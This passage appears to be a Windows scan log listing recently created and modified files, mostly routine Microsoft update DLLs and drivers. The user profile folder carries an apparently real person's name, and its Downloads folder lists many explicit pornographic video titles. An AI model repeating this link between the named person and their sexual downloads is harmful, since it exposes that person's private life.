2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-16 10:05 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-16 10:05 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-10-16 10:05 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 10:05 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 10:05 - 2014-09-09 17:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-10-16 10:05 - 2014-09-09 16:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-10-16 10:05 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 10:05 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-16 10:05 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-10-16 10:05 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-10-16 10:05 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-16 10:05 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-10-16 09:15 - 2014-10-16 09:18 - 264545614 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX096 - Gag and Tag.mp4
2014-10-16 09:09 - 2014-10-16 09:17 - 453227096 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Liam Riley & Max Carter.mp4
2014-10-16 09:06 - 2014-10-16 09:06 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Jaco Van Sant, Marco Bill
2014-10-16 08:59 - 2014-10-16 09:19 - 1064197652 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9444 - Sex Scenes, Condom Free; Jack Harrer & Marc Ruffalo 20140920 (FHDQ, 23,02 min).mp4
2014-10-16 08:59 - 2014-10-16 09:06 - 926591057 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9386 - Sex Scenes, Condom Archive; Julien Hussey & Jack Harrer 20140909 (FHDQ, 17,15 min).mp4
2014-10-16 08:58 - 2014-10-16 09:14 - 949384773 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9358 - Sex Scenes, Condom Free; Billy Cotton & Rocco Alfieri 20141002 (FHDQ, 17,42 min).mp4
2014-10-14 16:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 16:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 16:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 16:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 16:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 16:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 16:52 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 16:52 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 16:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 16:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 16:52 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-14 16:52 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 16:52 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 16:52 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 16:52 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 16:52 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-14 16:52 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-14 16:52 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 16:52 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-14 16:52 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 16:52 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-14 16:52 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 16:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 16:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 16:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 16:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 16:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 16:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 16:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 16:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 16:52 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 16:52 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 16:52 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 16:52 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 16:52 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 16:52 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 16:52 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 16:52 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 16:52 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 16:52 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 16:52 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 16:52 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 16:52 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 16:52 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 16:52 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 16:52 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 16:52 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 16:52 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 16:38 - 2014-10-14 16:40 - 311888027 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Tyler Hill & Lukas Grande.mp4
2014-10-14 16:36 - 2014-10-14 16:38 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Marcel Gassion, Jack Harrer, Paul Valery
2014-10-12 16:52 - 2014-10-12 16:58 - 449983828 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Jacob Dixon & Davey Brooks.mp4
2014-10-11 10:36 - 2014-10-11 10:39 - 326580168 _____ () C:\Users\JoseAlcazar\Downloads\BSB-DamienKyle-SalemPierce.mp4
2014-10-11 10:32 - 2014-10-11 10:40 - 405104785 _____ () C:\Users\JoseAlcazar\Downloads\[Dallas Reeves] Johnny Forza Barebacks Dylan Drive.mp4
2014-10-11 10:32 - 2014-10-11 10:36 - 437081403 _____ () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX085 - Don't Fight It.mp4
2014-10-11 10:31 - 2014-10-12 16:55 - 442999272 _____ () C:\Users\JoseAlcazar\Downloads\BSB-RonanKennedy-BrodyLasko.mp4
2014-10-11 10:29 - 2014-10-12 16:59 - 537899086 _____ () C:\Users\JoseAlcazar\Downloads\William Higgins - Marek Prohodil and Paul Belonek - Screen Test RAW - FULL CONTACT (720p).mp4
2014-10-09 15:36 - 2014-10-09 15:42 - 551483330 _____ () C:\Users\JoseAlcazar\Downloads\[Helix-8Teenboy] Braxton Klein & Michael Lee (720p).mp4
2014-10-09 15:35 - 2014-10-09 15:45 - 375474733 _____ () C:\Users\JoseAlcazar\Downloads\Sweet And Raw - Zac Todd and Boris Orla.mp4
2014-10-09 15:33 - 2014-10-09 15:38 - 551669606 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Tyler Takes Two.mp4
2014-10-09 15:30 - 2014-10-13 18:12 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Billy Cotton, Florian Nemec
2014-10-09 15:29 - 2014-10-09 15:31 - 386392477 _____ () C:\Users\JoseAlcazar\Downloads\[Sebastianstudios] Dumping Loads 2 scene 1.mp4
2014-10-08 09:56 - 2014-10-08 10:00 - 450787617 _____ () C:\Users\JoseAlcazar\Downloads\[Staxus-Dirty bleepers] Dick Casey, Kamyk Walker & Neo Matthews (BB) (DP) 720p.mp4
2014-10-08 09:50 - 2014-10-08 10:10 - 823568304 _____ () C:\Users\JoseAlcazar\Downloads\MEN - Daddys Workplace Part 2 - Cameron Kincade and Matthew Ryer (720p).mp4
2014-10-07 16:38 - 2014-10-07 16:45 - 742067555 _____ () C:\Users\JoseAlcazar\Downloads\Boy Crush - Don't Cum in the Pool, Guys.mp4
2014-10-07 16:36 - 2014-11-01 11:32 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Thor Martin
2014-10-07 16:35 - 2014-10-07 16:37 - 271902308 _____ () C:\Users\JoseAlcazar\Downloads\Colllege Dudes - Davey Anthony bleep Armando Torres (720p).mp4
2014-10-07 16:34 - 2014-10-07 16:46 - 667931454 _____ () C:\Users\JoseAlcazar\Downloads\Helix - Alex Vaara & Andy Taylor.mp4
2014-10-06 17:52 - 2014-10-06 17:55 - 452618195 _____ () C:\Users\JoseAlcazar\Downloads\[D] [CaStJo] Brad Fitt & Felix Webster (BB) (2012).mp4
2014-10-06 17:41 - 2014-10-06 17:49 - 794302179 _____ () C:\Users\JoseAlcazar\Downloads\[D] [Staxus] [SauVage] - Ariel Varga & Dexter Bure & (720p).mp4
2014-10-06 17:36 - 2014-10-06 17:41 - 208881351 _____ () C:\Users\JoseAlcazar\Downloads\CollegeDudes247 - Aaron James bleep Thor Martin.wmv
2014-10-06 17:34 - 2014-10-06 17:49 - 1455403661 _____ () C:\Users\JoseAlcazar\Downloads\Tasty Tayte [Jake Jaxson - CockBoys].wmv
2014-10-06 17:30 - 2014-10-06 17:34 - 427629180 _____ () C:\Users\JoseAlcazar\Downloads\Hard Brit Lads - Jordan Fox & Kamyk Walker.mp4
2014-10-06 17:29 - 2014-10-06 17:32 - 302279424 _____ () C:\Users\JoseAlcazar\Downloads\GayHoopla - Edge of Desire Part 2.mp4

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:36 - 2013-04-17 19:04 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-05 10:36 - 2013-04-17 19:04 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-05 10:36 - 2013-01-27 10:39 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-05 10:36 - 2012-09-26 13:06 - 01136660 _____ () C:\Windows\WindowsUpdate.log
2014-11-05 10:33 - 2012-09-26 13:39 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2014-11-05 10:33 - 2012-09-26 13:39 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
2014-11-05 10:33 - 2012-09-26 13:27 - 00000000 ____D () C:\Program Files (x86)\Dell DataSafe Local Backup
2014-11-05 10:33 - 2012-09-26 13:04 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-11-05 10:33 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 10:33 - 2009-07-13 23:51 - 00079316 _____ () C:\Windows\setupact.log
2014-11-04 18:29 - 2012-09-30 15:09 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\uTorrent
2014-11-04 18:12 - 2012-09-30 16:25 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\vlc
2014-11-04 18:10 - 2012-10-04 19:23 - 00000000 ____D () C:\Users\JoseAlcazar\~watched
2014-11-04 18:07 - 2012-10-18 15:54 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\torrents
2014-11-04 17:17 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 17:17 - 2009-07-13 23:45 - 00021296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 17:15 - 2009-07-14 00:13 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-03 18:54 - 2014-04-01 17:45 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\~IN PROGRESS
2014-11-03 18:05 - 2012-10-01 16:55 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\CrashDumps
2014-11-01 11:37 - 2014-01-10 18:09 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Dustin Revees
2014-11-01 11:11 - 2013-12-27 15:55 - 00000000 ____D () C:\ProgramData\Norton
2014-10-30 15:30 - 2010-11-20 22:47 - 00330776 _____ () C:\Windows\PFRO.log
2014-10-28 19:42 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-28 18:17 - 2013-01-14 21:53 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-28 06:34 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-25 18:23 - 2012-09-26 13:24 - 00000000 ____D () C:\Program Files (x86)\Dell Wireless
2014-10-25 18:21 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-25 18:20 - 2012-12-27 19:26 - 00246804 _____ () C:\Windows\system32\Drivers\AtherosBt.bin
2014-10-25 18:20 - 2012-12-27 19:26 - 00001926 _____ () C:\Windows\system32\Drivers\ramps_0x31010000_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001796 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40_cs02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001796 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001768 _____ () C:\Windows\system32\Drivers\ramps_0x11020000_40_cs01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001516 _____ () C:\Windows\system32\Drivers\ramps_0x31010000_40_dc01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001242 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001228 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x04.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001214 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x03.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001204 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40_0x02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001204 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001198 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_26.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00001192 _____ () C:\Windows\system32\Drivers\ramps_0x01020200_26_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000296 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000278 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x04.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x03.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40_0x02.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_40.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_26_0x01.dfu
2014-10-25 18:20 - 2012-12-27 19:26 - 00000264 _____ () C:\Windows\system32\Drivers\ramps_0x01020201_26.dfu
2014-10-25 18:19 - 2012-09-26 13:24 - 00000000 ____D () C:\Windows\system32\nn-NO
2014-10-25 18:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 18:18 - 2012-09-26 13:23 - 00000000 ____D () C:\ProgramData\Dell
2014-10-25 18:13 - 2012-09-26 13:27 - 00000000 ____D () C:\Temp
2014-10-25 18:07 - 2012-09-26 13:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-10-25 13:21 - 2014-07-02 18:51 - 00007611 _____ () C:\Users\JoseAlcazar\AppData\Local\Resmon.ResmonCfg
2014-10-25 12:35 - 2012-11-05 20:39 - 00000000 ____D () C:\Users\Guest\Documents\Bluetooth Folder
2014-10-25 12:35 - 2012-09-30 14:33 - 00000000 ____D () C:\Users\JoseAlcazar\Documents\Bluetooth Folder
2014-10-24 16:02 - 2014-08-24 14:11 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Adobe
2014-10-18 09:37 - 2012-10-07 16:37 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\QuickPar
